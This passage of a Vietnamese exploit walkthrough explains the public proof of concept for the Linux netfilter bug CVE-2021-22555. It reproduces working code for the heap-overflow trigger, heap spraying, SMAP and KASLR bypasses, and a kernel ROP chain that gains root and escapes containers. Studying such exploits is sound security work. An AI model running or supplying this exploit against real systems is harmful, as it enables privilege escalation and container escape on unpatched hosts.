Tham số thứ ba được truyền là msgsz - sizeof(long) vì tham số này lấy kích thước của phần mtext, nên chúng ta lấy kích thước của cả cấu trúc msg_primary trừ cho kích thước của mtype.
Để hiểu chi tiết hơn, bạn có thể đọc ở đây .

dòng 6-7 dùng với mục đích kiểm tra double reference ở các bước sau.

Spraying second messages

1
2
3
4
5
6
7
8
9


 printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }

Tạo secondary message tương tự với tạo primary messages, chỉ khác là kích thước của msg_secondary lúc này là 1024 thay vì 4096, do đó, cấu trúc của msg_secondary sẽ là:

1
2
3
4


struct {
  long mtype;  // message type; write_msg() overwrites it before sending
  char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];  // text sized so that header plus text add up to SECONDARY_SIZE
} msg_secondary;

Với SECONDARY_SIZE = 1024.

Creating holes in primary messages

1
2
3
4
5
6


  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }

Dùng vòng for để giải phóng các primary message với HOLE_STEP = 1024 và NUM_MSQIDS = 4096.
Hàm read_msg được định nghĩa như sau:

1
2
3
4
5
6
7


/*
 * Receive one message of type msgtyp from msqid into msgp. msgsz is the size
 * of the whole buffer, type field included. Returns 0 on success, -1 (after
 * perror) when msgrcv() fails.
 */
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  const size_t text_len = msgsz - sizeof(long); /* msgrcv() takes the text size only */

  if (msgrcv(msqid, msgp, text_len, msgtyp, 0) >= 0)
    return 0;

  perror("[-] msgrcv");
  return -1;
}

Dễ thấy, write_msg và read_msg là một cặp hàm gọi tương ứng các lệnh msgsnd và msgrcv để gửi và nhận các messages. Với msgrcv, sau khi nhận xong, vùng nhớ của message vừa nhận sẽ được giải phóng; do đó, vòng lặp trên tạo ra các lỗ trống (hole) có kích thước 4096 bytes giữa các primary message — cứ mỗi HOLE_STEP = 1024 hàng đợi lại có một primary message bị giải phóng.

Triggering out-of-bounds write…

1
2
3


  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


int trigger_oob_write(int s) {  // s: the socket setsockopt() is issued on; returns -1 only for ENOPROTOOPT
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];  // filler accounted to the match; its length sets where the target lands
    struct xt_entry_target target;
  } data = {0};

  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));

  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));

  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));  // the match claims the filler as its data
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;

  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");  // target name plus revision select which targetsize is used
  data.target.u.user.revision = 1;

  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {  // any other errno falls through to the return 0 below
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }

  return 0;
}

Hàm trigger_oob_write có mục đích kích hoạt lỗi heap out-of-bounds được đề cập ở trên. Hàm setsockopt được gọi ở dòng 29 với optname là IPT_SO_SET_REPLACE, kết hợp với quyền CAP_NET_ADMIN khi tạo docker, sẽ kích hoạt hàm xt_compat_target_from_user() - hàm chứa lỗi heap out-of-bounds.
Dòng 25 tác giả sử dụng cấu trúc NFQUEUE để kiểm soát giá trị của target->targetsize.
Về cấu trúc của data, tôi vẫn chưa thực sự hiểu. Ở đây, tác giả dùng khai báo struct __attribute__((__packed__)) để trình biên dịch không chèn thêm các byte đệm căn chỉnh (memory alignment) giữa các thành phần, nhờ đó kích thước của data đúng bằng tổng kích thước các thành phần; các cấu trúc ipt_* là các cấu trúc được sử dụng trong netfilter và có mối quan hệ như hình bên:
.

Searching for corrupted primary message

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


 printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }

  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }

  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);

Dùng vòng for từ dòng 2-10 để kiểm tra tất cả các message đã được cấp phát
Hàm peek_msg() để đọc giá trị của các message và lưu vào msg_secondary, được định nghĩa như sau:

1
2
3
4
5
6
7
8


/*
 * Fetch a copy of a message from System V queue `msqid` into `msgp`.
 *
 * `msgsz` is the size of the whole user buffer, including its leading
 * `long mtype` field; only the payload part (msgsz - sizeof(long)) is
 * passed on to msgrcv().
 *
 * The call uses MSG_COPY | IPC_NOWAIT. Per msgrcv(2), MSG_COPY fetches a
 * copy without removing the message, and `msgtyp` is then interpreted as
 * the ordinal position in the queue rather than as a message type.
 *
 * Returns 0 on success; on failure reports via perror() and returns -1.
 */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  const int flags = MSG_COPY | IPC_NOWAIT;
  const size_t payload_len = msgsz - sizeof(long);
  ssize_t received = msgrcv(msqid, msgp, payload_len, msgtyp, flags);

  if (received >= 0)
    return 0;

  perror("[-] msgrcv");
  return -1;
}

Khá giống với hàm read_msg đều gọi hàm msgrcv, điểm khác biệt duy nhất là msgflg có giá trị là MSG_COPY | IPC_NOWAIT

Dòng 11-15 dùng giá trị của msg_secondary.mtext[4] để kiểm tra xem liệu có xuất hiện trường hợp 2 cấu trúc cùng tham chiếu đến một địa chỉ hay không. Ở bước khởi tạo, chúng ta gán cho mỗi msg_secondary.mtext[4] giá trị chỉ số i tương ứng; trong bước này, nếu tồn tại một message có msg_secondary.mtext[4] khác với chỉ số tương ứng của nó, điều đó có nghĩa là con trỏ next của primary message tại chỉ số đó (fake_idx) đã bị ghi đè và đang trỏ nhầm tới secondary message của một hàng đợi khác (real_idx).

STAGE 2: SMAP bypass

Freeing real secondary message…

1
2
3
4


  printf("[*] Freeing real secondary message...\n");
  if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
               MTYPE_SECONDARY) < 0)
    goto err_rmid;

Giống như những stage trước, để giải phóng các messages đã được cấp phát, ta dùng lệnh read_msg để đọc message rồi giải phóng vùng nhớ đó.

Spraying fake secondary messages…

1
2
3
4
5


memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
            PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Sau khi đã giải phóng message gốc, chúng ta tạo ra một fake secondary message thông qua hàm build_msg_msg:

1
2
3
4
5
6
7
8
9


/*
 * Fill in the header fields of the msg_msg image at `msg`.
 *
 * The list links, the size field (`m_ts`) and the `next` pointer are taken
 * from the arguments; the type is always MTYPE_FAKE and `security` is
 * always zero.
 */
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next,
                   uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  /* Fixed fields, identical for every header built here. */
  msg->security = 0;
  msg->m_type = MTYPE_FAKE;

  /* List links supplied by the caller. */
  msg->m_list_prev = m_list_prev;
  msg->m_list_next = m_list_next;

  /* Size field and continuation pointer supplied by the caller. */
  msg->next = next;
  msg->m_ts = m_ts;
}

Tiến hành spray cấu trúc sk_buff bằng hàm spray_skbuff:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


/*
 * Write the `size` bytes at `buf` NUM_SKBUFFS times into end [0] of each of
 * the NUM_SOCKETS socket pairs in `ss`.
 *
 * Returns 0 when every write succeeded. On the first failing write the
 * error is reported via perror() and -1 is returned immediately.
 */
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int pair = 0; pair < NUM_SOCKETS; pair++) {
    for (int sent = 0; sent < NUM_SKBUFFS; sent++) {
      if (write(ss[pair][0], buf, size) >= 0)
        continue;

      perror("[-] write");
      return -1;
    }
  }

  return 0;
}

sk_buff là một nguyên liệu tuyệt vời để tạo UAF: thao tác này làm cho cấu trúc sk_buff trỏ tới fake message của chúng ta. Khi chúng ta giải phóng fake message, cấu trúc sk_buff vẫn còn và vẫn trỏ tới vị trí của fake message đó.
Để thực hiện spray, ta dùng hai vòng for, vòng thứ nhất đi qua tất cả các cặp SOCKETS được khởi tạo, vòng thứ 2 đi qua tất cả các cấu trúc sk_buff đang có trên mỗi cặp socket rồi dùng lệnh write để cấp phát và ghi nội dung fake secondary message của chúng ta.

Leaking adjacent secondary message

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


// Use the fake secondary message to read out-of-bounds.
  printf("[*] Leaking adjacent secondary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak adjacent secondary message.\n");
    goto err_rmid;
  }

  // The secondary message contains a pointer to the primary message.
  msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (PRIMARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

  if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }

Sau khi spray để cấu trúc sk_buff trỏ đến fake message, ta cần leak địa chỉ của secondary message kế tiếp. Ta cần địa chỉ này để có thể giải phóng vùng nhớ tại đó. Với cấu trúc của msg_fake là:

1
2
3
4


// User-space buffer handed to peek_msg()/read_msg() when reading through the
// fake message: a `long mtype` followed by the payload bytes.
struct {
  long mtype;
  // NOTE(review): sized as (PAGE_SIZE - MSG_MSG_SIZE) + (PAGE_SIZE -
  // MSG_MSGSEG_SIZE), presumably the payload of a first page plus the payload
  // of one follow-up segment; confirm against the kernel's message layout.
  char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;

Ở đây, mtext được cấp phát với kích thước là PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE,

1
2
3
4


// Size in bytes of the msg_msgseg header declared just below.
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))
// Segment header consisting of a single 64-bit `next` field.
// NOTE(review): presumably mirrors the kernel's struct msg_msgseg; confirm.
struct msg_msgseg {
  uint64_t next;
};

Dùng hàm peek_msg để lấy fake_message tại index fake_idx, lưu vào msg_fake.
Câu lệnh ở dòng 7 để đảm bảo rằng dữ liệu leak được là hợp lệ: khi khởi tạo, mọi message gốc đều được gán MSG_TAG ở đầu mtext, nên nếu đọc vượt biên thành công thì msg_fake.mtext[SECONDARY_SIZE] (tức đầu mtext của secondary message liền kề) phải bằng MSG_TAG.
Trong cấu trúc struct msg_msg có một trường là m_ts được sử dụng để xác định kích thước dữ liệu trả lại cho user với kích thước gốc là 1024-sizeof(struct msg_msg). Tuy nhiên, chúng ta đã cấp phát với PAGESIZE = 4096 do đó, kích thước này có giá trị là 4096 - sizeof(struct msg_msg). Chính điều này cho phép chúng ta đọc được giá trị của cấu trúc liền kề.
Do đó, tại dòng 13 ta lấy ra cấu trúc msg_msg của message liền kề từ msg_fake. Sau đó, lấy giá trị của trường m_list_next và lưu vào kheap_addr.
Vì kheap_addr là nơi bắt đầu của các primary message nên nó sẽ là bội của PRIMARY_SIZE, phép toán kheap_addr & (PRIMARY_SIZE - 1) ở dòng 15 tương đương với kheap_addr mod PRIMARY_SIZE để kiểm tra xem m_list_next có phải là địa chỉ của message kế tiếp không, nếu không phải thì nó sẽ được gán giá trị m_list_prev.
Câu lệnh if ở dòng 19-22 để kiểm tra xem địa chỉ của chúng ta có hợp lệ không.

Freeing fake secondary messages…

1
2


  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


/*
 * Read up to `size` bytes into `buf` NUM_SKBUFFS times from end [1] of each
 * of the NUM_SOCKETS socket pairs in `ss`. Each read overwrites `buf`.
 *
 * Returns 0 when every read succeeded. On the first failing read the error
 * is reported via perror() and -1 is returned immediately.
 */
int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size) {
  for (int pair = 0; pair < NUM_SOCKETS; pair++) {
    for (int drained = 0; drained < NUM_SKBUFFS; drained++) {
      if (read(ss[pair][1], buf, size) >= 0)
        continue;

      perror("[-] read");
      return -1;
    }
  }

  return 0;
}

Bước tiếp theo giải phóng vùng nhớ của các fake secondary message. Tương tự như hàm spray_skbuff, hàm free_skbuff dùng 2 vòng for để đi qua tất cả các cặp socket và tất cả các cấu trúc sk_buff trên từng cặp socket, dùng lệnh read để đọc dữ liệu đã được ghi vào ss. Lệnh read sau khi đọc xong sẽ tiến hành giải phóng vùng nhớ này. Và đừng quên, cấu trúc sk_buff trỏ vào vùng nhớ vừa được giải phóng vẫn còn tồn tại.

Spraying fake secondary messages…

1
2
3
4
5
6
7
8


  // Put kheap_addr at next to leak its content. Assumes zero bytes before
  // kheap_addr.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Chúng ta xây dựng lại một fake secondary message, nhưng lần này, chúng ta xây dựng với msg->next = kheap_addr - MSG_MSGSEG_SIZE, với kheap_addr là địa chỉ được leak từ step trước. Ta tiến hành spray bằng lệnh spray_skbuff.

Leaking primary message…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


// Use the fake secondary message to read from kheap_addr.
  printf("[*] Leaking primary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak primary message.\n");
    goto err_rmid;
  }

  // The primary message contains a pointer to the secondary message.
  msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (SECONDARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;

  // Calculate the address of the fake secondary message.
  kheap_addr -= SECONDARY_SIZE;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

  // Sanity check on the computed address: the top 16 bits must all be set
  // and the low 16 bits must all be zero, otherwise bail out.
  if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }

Bước này căn bản giống với thao tác lấy địa chỉ của primary message trước đó, điểm khác duy nhất là cấu trúc msg_msg được lấy ra từ vị trí PAGE_SIZE - MSG_MSG_SIZE trong mtext.

STAGE 3: KASLR bypass

Freeing fake secondary messages…

Bước này đơn giản gọi lại hàm free_skbuff để giải phóng vùng nhớ của fake secondary messages.

1
2


  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

Spraying fake secondary messages…

1
2
3
4
5
6


  // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Chúng ta xây dựng cấu trúc msg_msg mới mà ở đó, m_list_next và m_list_prev cùng trỏ về 1 địa chỉ là kheap_addr

Freeing sk_buff data buffer…

1
2
3


  printf("[*] Freeing sk_buff data buffer...\n");
  if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto err_rmid;

Giải phóng vùng nhớ mà sk_buff trỏ tới bằng lệnh read_msg

Spraying pipe_buffer objects…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


  printf("[*] Spraying pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (pipe(pipefd[i]) < 0) {
      perror("[-] pipe");
      goto err_rmid;
    }
    // Write something to populate pipe_buffer.
    if (write(pipefd[i][1], "pwn", 3) < 0) {
      perror("[-] write");
      goto err_rmid;
    }
  }

Khi pipe được gọi, nó sẽ gọi hàm alloc_pipe_info() để cấp phát các vùng nhớ với cấu trúc là struct pipe_buffer

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
    ...
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    ...
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
        goto out_free_uid;
    ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                 GFP_KERNEL_ACCOUNT);
    ...
}

và cấu trúc của struct pipe_buffer:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    ...
};

chứa con trỏ ops trỏ tới cấu trúc pipe_buf_operations. Mặt khác, khi được cấp phát, ops sẽ trỏ tới một static struct anon_pipe_buf_ops. Cấu trúc này nằm trong vùng .data:

1
2
3
4
5
6


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
    .release    = anon_pipe_buf_release,
    .try_steal  = anon_pipe_buf_try_steal,
    .get        = generic_pipe_buf_get,
};

Vì khoảng cách từ .data với .text luôn không đổi, nên từ địa chỉ anon_pipe_buf_ops chúng ta có thể tính kernel base address. Vì vậy, chúng ta spray để cấp phát các cấu trúc pipe_buffer với mục tiêu 1 cấu trúc sẽ nằm ngay vị trí được struct sk_buff trỏ tới vừa được giải phóng ở bước trước.
bypass_k_1

Leaking and freeing pipe_buffer object…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


  printf("[*] Leaking and freeing pipe_buffer object...\n");
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
        perror("[-] read");
        goto err_rmid;
      }
      if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
        pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
    }
  }

  kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;
  printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
  printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);

  if ((kbase_addr & 0xFFFF0000000FFFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel base address is incorrect.\n");
    goto err_rmid;
  }

Chúng ta dùng 2 vòng for để đi qua tất cả các vùng nhớ mà sk_buff trỏ tới, tại đây, ta đọc dữ liệu, lưu vào vùng đệm secondary_buf tại dòng 4. Tại dòng số 8, ta kiểm tra để xác định vùng nhớ mà chúng ta muốn. MTYPE_FAKE là giá trị được gán cho msg->m_type khi chúng ta tạo fake msg_msg từ hàm build_msg_msg. Do đó, vùng nhớ nào có giá trị tại secondary_buf[0x10] khác với MTYPE_FAKE chính là vùng nhớ của pipe_buffer mà chúng ta spray được.
Ta lấy địa chỉ của vùng nhớ này tại dòng 9 và lưu vào biến pipe_buffer_ops
kbase_addr được tính từ công thức ở dòng 13, trong đó:

Để tính ANON_PIPE_BUF_OPS, ta lấy địa chỉ của anon_pipe_buf_ops và _text trong file /proc/kallsyms:

1
2
3
4
5


root@ubuntu:/home/edisc/Desktop/cve-2021-22555/security-research/pocs/linux/cve-2021-22555# cat /proc/kallsyms | grep anon_pipe_buf_ops
ffffffff9c878380 r anon_pipe_buf_ops  

root@ubuntu:/home/edisc/Desktop/cve-2021-22555/security-research/pocs/linux/cve-2021-22555# cat /proc/kallsyms | grep _text 
ffffffff9b800000 T _text

ANON_PIPE_BUF_OPS = anon_pipe_buf_ops - _text

STAGE 4: Kernel code execution

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


  printf("[+] STAGE 4: Kernel code execution\n");

  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }

  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);
  printf("[+] Root privileges gained.\n");

Spraying fake pipe_buffer objects…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Chúng ta tạo một fake pipe_buffer objects với kheap_addr + 0x290.
Tiếp theo, dòng 6-9 dùng cho Container-Optimized OS (COS) với kernel 5.4.89 và dòng 10-13 cho Ubuntu với kernel 5.8.0-48
Xây dựng một kernel rop lưu vào secondary_buf và dùng lệnh spray_skbuff để đưa kernel_rop của chúng ta vào vùng nhớ để thực thi.
Hàm build_krop được xây dựng như sau:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95



// Fill `buf` with a sequence of 64-bit values: gadget/function offsets
// rebased on `kbase_addr`, plus immediates and placeholder words.
//
// Parameters:
//   buf             - destination byte buffer; no size is passed in, so the
//                     caller must provide enough room for every store below.
//   kbase_addr      - base value added to each gadget/function offset macro.
//   scratchpad_addr - address written into the chain where RBP is saved, and
//                     used again (with a bias) when RBP is reloaded.
//
// Layout depends on the build-time target macro:
//   KERNEL_COS_5_4_89      - one value at offset 0x00, chain starts at 0x18.
//   KERNEL_UBUNTU_5_8_0_48 - values at offsets 0x39 and 0x00, chain starts
//                            at 0xD8.
// If neither macro is defined, nothing is written and `rop` stays unused.
//
// Note: Must not touch offset 0x10-0x18.
void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
  uint64_t *rop;
#ifdef KERNEL_COS_5_4_89
  *(uint64_t *)&buf[0x00] = kbase_addr + POP_RSP_POP_RBX_RET;

  rop = (uint64_t *)&buf[0x18];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R14
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R14
  *rop++ = 0xDEADBEEF; // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  // NOTE(review): the -0x25 bias presumably cancels the 0x25 displacement
  // suggested by the next gadget's name; confirm against the gadget.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0x25; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_25_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#elif KERNEL_UBUNTU_5_8_0_48
  // NOTE(review): offset 0x39 is not 8-byte aligned, so this is a misaligned
  // 64-bit store through a cast pointer.
  *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET;
  *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET;

  rop = (uint64_t *)&buf[0xD8];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R12
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;
